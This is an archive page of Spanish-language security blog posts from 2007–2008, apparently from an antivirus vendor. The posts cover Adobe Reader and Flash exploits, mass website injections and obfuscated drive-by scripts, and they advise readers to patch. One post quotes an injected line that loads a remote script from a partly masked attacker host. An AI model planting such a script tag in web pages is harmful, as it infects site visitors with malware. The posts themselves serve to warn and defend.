Archivo para la Categoria 'Vulnerabilidades'
Vulnerabilidad (otra vez) de Adobe Reader
Junio 25, 2008 10:29 amUna vez más Adobe Reader es vulnerable a un error no especificado y que se está aprovechando para difundir malware.
El caso es semejante al que ya comentamos en malware en archivos PDF y al mostrado en nuestro Video Educativo sobre infección en archivos PDF. Por supuesto, la recomendación es la misma de antes: actualizar lo más pronto posible a Adobe Reader versión 8.1.2 Security Update 1.
Otra alternativa es abrir Adobe Reader y hacer que el programa busque las actualizaciones disponibles, tal y como se muestra en nuestro video o en esta imagen:
De esta forma, se evitará ser víctima de la descarga de un malware a través de la ejecución de archivos PDF modificados para tal fin.
Cristian
Archivos Flash en peligro (actualización)
Junio 1, 2008 1:12 pmTal y como lo habíamos anunciado desde nuestro Laboratorio, Adobe acaba de confirmar que la versión Flash Player 9.0.124.0 no es vulnerable a este exploit por lo que debe procederse a actualizar inmediatamente.
Nos enorgullece haber sido una de las primeras compañias que protegió e informó al usuario de esta amenaza. Actualmente los archivos dañinos siguen siendo identificadas y además el exploit es identificado por ESET NOD32 como SWF/Exploit.CVE-2007-0071 por lo que cualquier amenaza que aparezca en el futuro, explotando esta vulnerabilidad, será bloqueada.
Cristian
Archivos Flash en peligro
Mayo 28, 2008 9:27 pmSe han reportado gran cantidad de sitios que, aprovechando una vulnerabilidad en Flash Player de la empresa Adobe, descargan e instalan malware en el equipo del usuario. Esta vulnerabilidad, un desbordamiento de buffer, permite ejecutar scripts en el equipo del usuario y la posterior descarga de códigos dañinos.
Adobe, luego de su investigación, ha catalogado a esta vulnerabilidad como crítica y que solo afectaría (aún en investigación) a las versiones de Flash Player anteriores a la última versión Flash Player 9.0.124.0 por lo que es recomendable:
- Actualizar de inmediato este reproductor desde la página de descarga oficial de Adobe.
- Utilizar aplicaciones que permitan el bloqueo de scripts desde sitios web.
- Utilizar un antivirus con capacidades proactivas para detectar y bloquear la posible descarga de malware a través de vulnerabilidades como estas.
En este momento, ESET NOD32 detecta los archivos Flash maliciosos como SWF/TrojanDownloader.Swif.C y las amenazas descargadas como gusano Jalous o como troyano TrojanDownloader.Psyme.
Como siempre mencionamos, los creadores de malware se valen de muchas herramientas y la falta de actualización del sistema operativo y de las aplicaciones, por parte del usuario, es una de ellas. Recuerde que actualizar todas las aplicaciones es fundamental.
Cristian
Durante esta madrugada, nuestro laboratorio detectó otro caso donde varios miles de sitios web fueron modificados por atacantes para inyectar códigos maliciosos en sus páginas.
En esta oportunidad, se inyecta una línea como la siguiente en el sitio web vulnerable:
<script src=http://www.ch****.com/reg.js></script>
Ese archivo contiene código JavaScript que crea una etiqueta iFrame en el sitio web, la cual apunta a otro script, en este caso VBScript, que ESET NOD32 Antivirus detecta como VBS/TrojanDownloader.Iframe.NAA, que luego descarga otros tantos códigos maliciosos aprovechando una vulnerabilidad existente en el componente ActiveX de MDAC de Windows.
Esta vulnerabilidad está documentada en el siguiente enlace:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003
La misma puede ser parcheada con la actualización disponible aquí:
http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx
La inyección de códigos maliciosos en sitios webs tradicionales, aprovechando vulnerabilidades en estos últimos, es una técnica cada vez más usada en estos días, como hemos reportado aquí en varias oportunidades.
Como siempre, recomendamos que mantengan sus antivirus actualizados y con las capacidades de detección heurística activadas a fin de mantenerse protegidos contra estas amenazas que aparecen a diario.
En cuanto a los administradores de sitios web, es importante que mantengan actualizado el software que utilizan tanto para su servidor como el sitio en si mismo, y que apliquen prácticas de programación segura para evitar las inyecciones de código.
Franco
Vulnerabilidad en Adobe Reader permite descargar malware
Febrero 12, 2008 9:46 amDías atrás Adobe lanzó la actualización 8.1.2 de su producto más conocido: el lector de archivos PDF, Adobe Reader. En ese momento, Adobe no dió detalles de las 26 correcciones realizadas e incluso al momento de escribir esto, la actualización en castellano (sí la de inglés) aún no se encuentra disponible para descargar automáticamente y debe actualizarse a la nueva versión 8.1.2 manualmente desde el sitio de Adobe.
Luego de un pequeño análisis de la actualización realizada por Adobe, se puede llegar a la conclusión que estas vulnerabilidades son críticas porque permiten la ejecución de código Javascript en el sistema del usuario, permitiendo que, por ejemplo, se pueda descargar y ejecutar malware en el mismo.
Esto es lo que ha estado sucediendo desde hace unos días y los Adobe Reader no actualizados han estado siendo aprovechados para instalar diversos tipos de malware como KillAV o Zonebac o gusanos de la vieja familia Bagle (profundamente analizado por ESET).
Sin importar el malware descargado y que se sabe que puede cambiar en cualquier momento, lo importante es:
- Para los productos antivirus, detectar la explotación de la vulnerabilidad para cortar la cadena de infección desde el primer momento. Es por ello que ESET NOD32 detecta este exploit como PDF/Exploit.Pidief.A. Gracias a esta detección, no importa el código dañino que se intente descargar debido a que dicha descarga nunca sucederá.
- Para el usuario, es fundamental actualizar su Adobe Reader a la versión mencionada o bien utilizar un producto alternativo para la lectura de archivos PDF.
Actualización 27/02/2008: acabamos de publicar un video educativo sobre el funcionamiento de esta vulnerabilidad y la forma de evitar ser infectado.
Cristian
Estadísticas de malware, phishing y spam
Noviembre 8, 2007 12:48 pmIBM Internet Security Systems nació en 1994 y desde entonces se ha transformado en uno de los referentes obligados a la hora de estudiar amenazas en Internet.
En agosto ISS ha publicado completos informes sobre tendencias y estadísticas de vulnerabilidades, malware, phishing y spam, los cuales dejo para su evaluación.
En los informe se destaca la proliferación de ataques que explotan vulnerabilidades no parcheadas en los sistemas, el crecimiento del robo de información confidencial para efectuar fraudes y el phishing como una práctica normal y corriente.
En la siguiente imagen, por ejemplo, puede verse lo remarcamos desde ESET Latinoamérica desde hace tiempo: el crecimiento desmedido de los troyanos y gusanos como herramienta de los delincuentes informáticos.
Espero disfruten de los informes.
Cristian
Ejecución transparente de códigos maliciosos
Septiembre 20, 2007 1:16 pmNumerosos tipos de códigos maliciosos poseen la capacidad de infectar un equipo informático con el solo hecho de visitar una página web. Si señor, con la simple acción de visitar un sitio en Internet, es posible que creadores de malware comprometan nuestra computadora con alguna de sus creaciones.
Pero… ¿cómo puede ser posible? Bueno, los programadores malintencionados buscan constantemente desarrollar técnicas que permitan evadir las aplicaciones de seguridad o por lo menos, dificultar su análisis y detección.
Tal vez, muchos lectores hayan notado en más de una oportunidad que cuando ingresan a determinadas páginas web, estas tardan en cargarse y vemos que la barra de progreso se “estanca” en la mitad de la carga. Esto puede ser un indicio de que, en ese preciso momento, nuestra computadora estaría siendo víctima de un intento de infección.
Este tipo de páginas contienen dentro del código HTML un script malicioso que se encarga de descargar (e incluso ejecutar), por lo general, un troyano. Este script generalmente se encuentra “protegido” con una técnica que recibe el nombre de ofuscación.
Con esta técnica, se busca dificultar al máximo la lectura y/o análisis del código haciendo que sea lo más ilegible posible. En la siguiente captura podemos observar un ejemplo de cómo se ve un código ofuscado dentro de una página web.
En la imagen podemos apreciar que se utilizaron dos lenguajes para crear el script: JavaScript y VBScript. Además, también se observan los archivos ejecutables (el malware) que se copia y ejecuta respectivamente al momento de ingresar a una página que contiene inyectado este código ofuscado.
Se pueden encontrar codificados con diferentes metodologías pero básicamente se lo ve más o menos de la misma manera. Aquí tienen otro ejemplo:
La idea de dificultar el análisis de debe a que a través del ofuscamiento se esconde generalmente un exploit que aprovecha alguna vulnerabilidad de nuestro sistema operativo o aplicación instalada. De aquí la importancia de mantener al día las actualizaciones de nuestro equipo y antivirus.
Estos casos conforman buenos ejemplos para que dejemos de hacer clic, por ejemplo, sobre los enlaces que nos llegan a través de programas de mensajería instantánea o a través del correo electrónico no deseado.
Después de esta lectura ¿quedará algún lector sin actualizar su sistema operativo?
El éxito de este tipo de técnicas, depende en gran medida de nosotros, los usuarios. Somos nosotros mismos una especie de gran antivirus que, al igual que este tipo de programas, en la medida en que no nos mantengamos actualizados e informados, estaremos facilitando la entrada de estas amenazas a nuestro sistema.
Jorge
